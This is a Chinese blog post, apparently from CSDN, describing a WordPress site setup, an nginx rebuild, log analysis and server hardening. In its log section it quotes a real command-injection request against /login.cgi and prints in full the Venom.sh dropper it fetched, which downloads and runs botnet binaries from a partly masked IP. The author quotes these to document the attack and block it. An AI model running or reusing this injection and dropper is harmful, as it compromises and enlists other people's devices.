Wordpress 建站 及安全防护

40 篇文章 0 订阅
23 篇文章 1 订阅

安装程序,花不少时间找模版。英文的模版感觉都不大符合中文站。找了一些中文模版,博客一号,justnews 感觉样式不错,就是要付费。 开始先省钱吧,后来找到一个不错的免费模版: frontopen2。

--------------------------

想在顶部 logo区域显示大幅图片广告,找了几个插件:

Head and Footer Scripts Inserter:  在 <head> 后面  <foot>  标签 插入 javascript、css 代码。 如果插入 js 广告代码,会靠左显示,不能控制位置。

Ad Inserter,adrotate,post layout  都不能 控制位置。 懒得折腾了,直接修改模版的 head.php 文件。

--------------------------

考虑以后要建立多个站,想统一管理流量情况。 写了个程序,在服务器运行,每小时把 nginx 日志,上传到 log管理网站,分析提取后,存入数据库。但是发现 $http_accept_language 是空值,baidu后了解,需要给nginx添加一个模块,才能获取这个值。

wget https://github.com/giom/nginx_accept_language_module/archive/master.zip

./configure --user=www --group=www --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-http_v2_module --with-http_gzip_static_module --with-http_sub_module --with-stream --with-stream_ssl_module --with-openssl=/root/openssl-1.1.1d "--with-ld-opt='-ljemalloc'"  --add-module=/root/nginx_accept_language_module-master

log网站,每5分钟扫描一次,看是否有新的日志文件。查看日志的时候,发现不少入侵信息:

/login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.xxx/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$

Venom.sh 的内容是这样的

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.ips; chmod +x Ouija_M.ips; ./Ouija_M.ips; rm -rf Ouija_M.ips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.psl; chmod +x Ouija_M.psl; ./Ouija_M.psl; rm -rf Ouija_M.psl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_S.h4; chmod +x Ouija_S.h4; ./Ouija_S.h4; rm -rf Ouija_S.h4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_x.86; chmod +x Ouija_x.86; ./Ouija_x.86; rm -rf Ouija_x.86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm6; chmod +x Ouija_A.rm6; ./Ouija_A.rm6; rm -rf Ouija_A.rm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_x.32; chmod +x Ouija_x.32; ./Ouija_x.32; rm -rf Ouija_x.32
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_P.pc; chmod +x Ouija_P.pc; ./Ouija_P.pc; rm -rf Ouija_P.pc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_I.586; chmod +x Ouija_I.586; ./Ouija_I.586; rm -rf Ouija_I.586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_M.68k; chmod +x Ouija_M.68k; ./Ouija_M.68k; rm -rf Ouija_M.68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_P.pc; chmod +x Ouija_P.pc; ./Ouija_P.pc; rm -rf Ouija_P.pc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm4; chmod +x Ouija_A.rm4; ./Ouija_A.rm4; rm -rf Ouija_A.rm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.132.53.xxx/Ouija_A.rm5; chmod +x Ouija_A.rm5; ./Ouija_A.rm5; rm -rf Ouija_A.rm5

下载一个文件,发现是编译好的 bin文件,没能力研究,先封禁这个IP:

iptables -I INPUT -s 185.132.53.xxx -j DROP

--------------------------

又发现大量来自同一个IP的 404式的暴力漏洞扫描,搜索资料,不少利用 fail2ban 来实现,感觉不是太精细。找到一个 

https://blog.51cto.com/joeyang/1878862

把他的 bash代码改成了php,每分钟执行一次,发现前一分钟有20次404的同一个IP,就封掉。

--------------------------

安全加固:

1) 修改 ssh 端口;改成只允许 ssh key登录

2) 把 phpmyadmin 改成非常规名字,避免被暴力扫描到

3)每天用程序扫描 www目录下所有文件的 md5,上传到 log管理服务器,log端程序分析文件变动情况、新增文件是否合理。

--------------------------

后续遇到问题:

 1、posts 表大量 revisions 类型记录。

wp-config.php 添加:
define('WP_POST_REVISIONS', false);
define('AUTOSAVE_INTERVAL', 86400);

2、内容被自动插入了 <p> <br>

在主题的functions.php 末尾加入如下代码:
remove_filter ('the_content', 'wpautop');

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值